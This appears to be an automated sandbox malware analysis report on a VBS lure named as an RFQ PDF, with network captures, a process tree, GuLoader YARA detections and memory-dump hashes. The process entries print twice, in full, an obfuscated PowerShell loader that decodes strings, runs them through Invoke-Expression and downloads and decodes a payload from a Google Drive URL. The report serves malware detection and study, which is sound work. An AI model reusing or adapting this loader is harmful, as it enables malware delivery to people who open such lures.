                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 49740 | 172.217.16.193 | 443 | 4092 | C:\Windows\SysWOW64\msiexec.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-10-25 17:44:06 UTC | 258 | OUT | GET /download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Cache-Control: no-cache
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-10-25 17:44:08 UTC | 4932 | IN | HTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="pLQbThrxYaBLSDAeejYcvLi110.bin"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 275008
                                              Last-Modified: Thu, 24 Oct 2024 09:03:12 GMT
                                              X-GUploader-UploadID: AHmUCY1X6OwPQ2A44Ahx_oFRtLIAFdk1HcGwrtZUWka2grAnjE-C4OwjyF8y1QirR9pGl1ETYEFVU47BVQ
                                              Date: Fri, 25 Oct 2024 17:44:08 GMT
                                              Expires: Fri, 25 Oct 2024 17:44:08 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=7u+o5w==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Target ID:0
                                              Start time:13:43:14
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
                                              Imagebase:0x7ff6a5210000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:13:43:17
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. 
befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. 
rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') 
;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:13:43:17
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:13:43:35
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. 
befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. 
rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') 
;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
                                              Imagebase:0x700000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:13:43:35
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff70f330000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:13:43:53
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                              Imagebase:0x100000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:13:44:12
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
                                              Imagebase:0xfb0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 4bc387c5c2a3361b21a0d641b38030023cdc73e167c80cfbba9f8524bd163d99
                                                • Instruction ID: a3bd0d97ca28a3d7b10984e6fd7058b5855abda58fdc523aa70247feff64b716
                                                • Opcode Fuzzy Hash: 4bc387c5c2a3361b21a0d641b38030023cdc73e167c80cfbba9f8524bd163d99
                                                • Instruction Fuzzy Hash: 7AF1A630609A4D8FEBA8DF28CC557E977D1FF58310F04426EE85DC7295DB34A9458B82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 732e2b3fe60f66273896b96a8815bd539f4e969c92f6af2006a4b64de829864c
                                                • Instruction ID: 328a3ff6f2851b4acf4ade381f87061c5473867d4e772b0049f9abd9a8226dd0
                                                • Opcode Fuzzy Hash: 732e2b3fe60f66273896b96a8815bd539f4e969c92f6af2006a4b64de829864c
                                                • Instruction Fuzzy Hash: 3BE1C430A09A4D8FEBA8DF28C8657E977D1FF58310F04826ED85DC72A5DE74A9418B81
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 372c27fab40303ce84764b0b92cccb793a6a50071e86eac5f1755e6a24e3a795
                                                • Instruction ID: a56440d1d89b5ec83202f1751f2e39e2dbcaca94f67ba5f2ac6dce3de34c8b8a
                                                • Opcode Fuzzy Hash: 372c27fab40303ce84764b0b92cccb793a6a50071e86eac5f1755e6a24e3a795
                                                • Instruction Fuzzy Hash: 2D021922A0F7C90FEB66976888655647BE1EF66214F0901FED0ADCB1E3DE18AD45C342
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 1c381f81335c5746a872ed3d1de50b063e2e6fe3a253b62718513dbbb31b2548
                                                • Instruction ID: 2448039ce902cac28dacdcba042604a504244512f19108bfc81fd7834e9e684e
                                                • Opcode Fuzzy Hash: 1c381f81335c5746a872ed3d1de50b063e2e6fe3a253b62718513dbbb31b2548
